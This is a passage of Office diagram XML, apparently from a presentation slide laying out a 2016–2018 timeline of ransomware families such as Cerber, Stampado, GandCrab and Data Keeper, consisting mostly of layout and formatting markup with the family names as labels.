    <dgm:cxn modelId="{0ACCB0B1-18FC-4480-8147-C236D233EA7F}" type="presParOf" srcId="{CA315584-19B4-439C-B551-4307E39B98D0}" destId="{CE0D2536-38E4-4692-9538-0A0CA3109358}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{A8585567-C783-4BBC-8D71-FA85FCA70D79}" type="presParOf" srcId="{CA315584-19B4-439C-B551-4307E39B98D0}" destId="{17FCDD22-8C77-4EF3-A79B-285075762E4A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{078EC851-097C-4860-886A-9C028715370C}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{B4993846-CB15-4AA2-9549-4F517BE3F233}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{F9A35E73-6B4D-41BA-84DD-DB4614CEC826}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{77A2AFD8-54FF-4D29-B35B-3D95D9C8EF79}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{3579C264-94EA-4835-967B-DE6D243DC751}" type="presParOf" srcId="{77A2AFD8-54FF-4D29-B35B-3D95D9C8EF79}" destId="{6464A6C5-1D76-43AA-BF38-BEF1414786CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{2D21C843-2F0A-431C-A3B6-24E192FB8580}" type="presParOf" srcId="{77A2AFD8-54FF-4D29-B35B-3D95D9C8EF79}" destId="{BDB0D409-C522-46E4-879E-3CCDF416C45C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{10DEED10-97EB-4BE4-83A9-7B439848877F}" type="presParOf" srcId="{77A2AFD8-54FF-4D29-B35B-3D95D9C8EF79}" destId="{66F8D413-CA9A-4804-9C37-FAB1BEC88291}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{62EF513A-BFC5-4893-8080-2AAB5E88C56F}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{8675D657-FD81-40F2-A5AC-7DB7535AABD7}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{63A3A968-D95B-4301-B6D8-440BABA6C55D}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{89199573-6B13-46C9-B18D-5858B71B55B4}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{FD173344-6AB9-41E2-A79E-4888FC5B16AD}" type="presParOf" srcId="{89199573-6B13-46C9-B18D-5858B71B55B4}" destId="{321AD513-822E-41DD-847C-9FBCF49C9F44}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{B1B7F0F6-C0D1-45EE-BF20-1AED1E20CD03}" type="presParOf" srcId="{89199573-6B13-46C9-B18D-5858B71B55B4}" destId="{F25F5B72-A6D4-4903-B95E-4E96B87BFAAE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{A9F4D783-B263-43C1-9ECD-14FCA2810566}" type="presParOf" srcId="{89199573-6B13-46C9-B18D-5858B71B55B4}" destId="{01B1F4B6-F585-41FD-A0CC-793AFEFE6410}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{4AD4A3E1-94A9-45F1-94AC-B344181892F9}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{6E34B34B-E52E-48ED-ABB6-DCE8C8AA0C03}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{756E24AD-F3B2-432F-9FE9-A278A8B66496}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{9A94170D-58A2-4D9C-9A72-58E722222F34}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{388D8CD0-866D-4DF7-9185-9108DE9E8980}" type="presParOf" srcId="{9A94170D-58A2-4D9C-9A72-58E722222F34}" destId="{F33886AF-511F-4677-874B-6FD9310FF6A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{1D41F6BC-AF76-4A84-AE17-F2EFE8F5591F}" type="presParOf" srcId="{9A94170D-58A2-4D9C-9A72-58E722222F34}" destId="{84BEFD2A-6ECE-4A2A-81F0-EEE91C5025BC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{8FFC13A1-C98D-42EB-8F2E-AD75B8CDB872}" type="presParOf" srcId="{9A94170D-58A2-4D9C-9A72-58E722222F34}" destId="{7759B26E-81AD-4C97-B0B1-7A4CDE1932D3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EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11" loCatId="process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EAF32EF-2685-41DE-B527-A19EA257EFF2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="5389635" y="1339948"/>
          <a:ext cx="1022729" cy="492876"/>
        </a:xfrm>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2016</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{180ECF10-61BF-4891-A06A-93E397C04263}" type="parTrans" cxnId="{270815E9-4A88-4DB4-9040-920BB982ABD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8B63689-AE32-480F-B66B-8481F7137AF6}" type="sibTrans" cxnId="{270815E9-4A88-4DB4-9040-920BB982ABD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="6763335" y="1339948"/>
          <a:ext cx="1022729" cy="492876"/>
        </a:xfrm>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2017</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B45DE71B-8C61-4A29-BBB0-5AA953CF7542}" type="parTrans" cxnId="{A81889D7-B4F1-469E-A91B-D36894BED34C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E03609D5-4748-4E3C-8F59-7CA6A6BDD666}" type="sibTrans" cxnId="{A81889D7-B4F1-469E-A91B-D36894BED34C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA1701F6-7B57-4B04-9E00-64FC8D153085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u="sng" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>February</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6530B81-68FB-4CB6-934B-339EA4E796B5}" type="parTrans" cxnId="{AA493673-DAC7-4571-B247-A7E1C831035C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CDBA56F-B9FD-42B0-9B00-3DC230E39858}" type="sibTrans" cxnId="{AA493673-DAC7-4571-B247-A7E1C831035C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43F0E182-20E4-4E20-BB27-BB45ED6AD1D6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1200" u="sng" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>December</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4EFBB008-E0FD-4055-808C-CEE53D875550}" type="parTrans" cxnId="{C8EECF99-0351-4257-86AF-3C999E8D4CA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A84729A-F474-41AA-92D2-39975C154C88}" type="sibTrans" cxnId="{C8EECF99-0351-4257-86AF-3C999E8D4CA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32C128A9-016D-42DD-8F84-7DB6002DB64B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1200" b="0" dirty="0" err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Cerber</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97F3B9C9-C5AA-43F1-901A-BEB1EF5AD1EA}" type="parTrans" cxnId="{41860949-F25A-4C41-A8C7-0C1A99A7742B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CD4A0DB-6E40-4D61-9E59-4D6306F6B256}" type="sibTrans" cxnId="{41860949-F25A-4C41-A8C7-0C1A99A7742B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{151F3749-5E5E-4037-8A0D-4ECA8B0B3DB8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1200" u="sng" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>July</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6707691-7632-4CCE-8B55-C6009746508C}" type="parTrans" cxnId="{990DAEE3-EFD2-4457-8CBF-CE6416191759}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4209C33B-949E-4774-988D-8FC100525F9D}" type="sibTrans" cxnId="{990DAEE3-EFD2-4457-8CBF-CE6416191759}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F174FEBA-606B-4758-B93F-F2CE28432A04}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="5478661" y="2802844"/>
          <a:ext cx="884708" cy="426573"/>
        </a:xfrm>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Stampado</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F2CBC27-B31C-43BE-9905-5E53C4C2C18F}" type="parTrans" cxnId="{4A089AA1-69A6-4213-A99C-FA57141EDE2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BA6908C-292D-4F6F-9E6F-94B1F1E8F88C}" type="sibTrans" cxnId="{4A089AA1-69A6-4213-A99C-FA57141EDE2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8970DD42-16BF-473B-B9EA-D23F839FB14B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0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Philadelphia</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC518083-7448-46A4-BA39-0C65D56F2454}" type="parTrans" cxnId="{B4FEBE7A-2BF7-40FE-B3B9-848E87BAF87B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAE5CB11-5EF7-41A6-8F0F-95FF005EAD41}" type="sibTrans" cxnId="{B4FEBE7A-2BF7-40FE-B3B9-848E87BAF87B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C104186-A88F-4F95-8FE2-4190E4FC7719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dirty="0" err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Ranion</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6085A540-300A-4A10-BE6E-55FAEB54CBAC}" type="parTrans" cxnId="{CEBC12DF-B1B9-4AFA-9406-F53DF9C9C3C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2397C22-272F-467A-B891-2329DD34EF38}" type="sibTrans" cxnId="{CEBC12DF-B1B9-4AFA-9406-F53DF9C9C3C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F0207D8-7CAB-4892-B356-7C2A8A213A1D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0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Saturn</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D1B7794-EE81-48B4-9322-7B559F68A8E0}" type="parTrans" cxnId="{515B7C57-0153-4B58-9D82-8C7BF3356598}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED7A0999-4F27-41A5-B228-1D2EC1D78CAA}" type="sibTrans" cxnId="{515B7C57-0153-4B58-9D82-8C7BF3356598}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5316300B-1479-4BE2-B4CA-7AFFB3E4A5B5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u="sng" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>February</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BB94DCE-8A0F-4BD9-926C-B5292145B277}" type="parTrans" cxnId="{C667D2B1-FA13-4F8F-8E53-91653C26C969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D949C87-CDEB-4FF7-BC8C-11E55F296888}" type="sibTrans" cxnId="{C667D2B1-FA13-4F8F-8E53-91653C26C969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABBB877F-D9D2-4849-AAF0-B10552247CE2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s-CR" sz="1200" b="0" i="0" dirty="0"/>
            <a:t>ShurL0ckr </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E847AAD9-00C8-4E2C-B3DA-6F09D59422BB}" type="parTrans" cxnId="{6D2F4227-BE2B-483D-A01D-E15B5C1E4A19}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C97C810-C309-450C-87CF-775D100CA8E8}" type="sibTrans" cxnId="{6D2F4227-BE2B-483D-A01D-E15B5C1E4A19}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4167FE8E-DA4D-4C42-8413-54F9484E73B0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u="sng" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>May</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F2FB77C-3145-4835-BBBA-2FF78280D34A}" type="parTrans" cxnId="{9800F993-E79D-4E84-9E4D-6B440DCE6DD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{803EC87C-477D-4009-8FF0-26D2C4E408B5}" type="sibTrans" cxnId="{9800F993-E79D-4E84-9E4D-6B440DCE6DD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52D8B2F3-3865-4204-838E-5B8723AD5B1D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dirty="0" err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Zelta</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F66BB769-5EA5-4050-8424-85221DFB27C6}" type="parTrans" cxnId="{F2EC819B-3F97-4BED-9874-0743B408A9B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0EB1011-8A11-4A4E-93CF-8077611D9BAD}" type="sibTrans" cxnId="{F2EC819B-3F97-4BED-9874-0743B408A9B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0C89D72-E6BE-4F70-BD4A-82213CA00498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0" dirty="0" err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Stampado</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> variant</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B10E7D77-3154-4E3A-9E2A-FA4D01DBB262}" type="parTrans" cxnId="{7AFFAF5B-FDFD-4AAF-B203-6F89BF0C2076}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C4CAA0F-01C5-49D3-B917-32635A2DA0D2}" type="sibTrans" cxnId="{7AFFAF5B-FDFD-4AAF-B203-6F89BF0C2076}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26C3B5E8-1E10-40EB-94D0-ECC488145431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1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2018</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{580A8190-AA38-4F15-96AA-E799AD11A2B2}" type="parTrans" cxnId="{62CADE60-04F3-4388-BFF7-E15904AE7D02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CF90CF2-C044-4C3B-9B77-F4E121E42C84}" type="sibTrans" cxnId="{62CADE60-04F3-4388-BFF7-E15904AE7D02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06E0AD7F-253E-41B7-9DB6-B501E66D0DF5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u="sng" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>January</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD45FD92-1140-45D1-AE70-119FDCFC0076}" type="parTrans" cxnId="{C6845501-6822-4A86-85AA-B391A8B3DF97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59872DB6-1476-41AE-BFFD-5C09AF344E3A}" type="sibTrans" cxnId="{C6845501-6822-4A86-85AA-B391A8B3DF97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E18FEC7A-D632-4985-BE41-47A231EDBCAB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0" dirty="0" err="1"/>
            <a:t>GandCrab</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37B460B8-47B3-459E-A072-D87BFDEB0BE8}" type="parTrans" cxnId="{111E4595-DC13-4AD0-9D6B-307D6DE6BF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83E871AF-511B-4CDE-AFB5-8A29054B333A}" type="sibTrans" cxnId="{111E4595-DC13-4AD0-9D6B-307D6DE6BF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40864BE2-C572-4FD6-BE0B-F69DB2AAC87F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0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Data Keeper</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6162F07D-FAB7-4C91-8E23-0AA9241A3906}" type="parTrans" cxnId="{EE978B03-180B-40C0-BCC5-C8A9BC36DFEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F72A638A-D138-442E-8847-DC4B31909273}" type="sibTrans" cxnId="{EE978B03-180B-40C0-BCC5-C8A9BC36DFEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
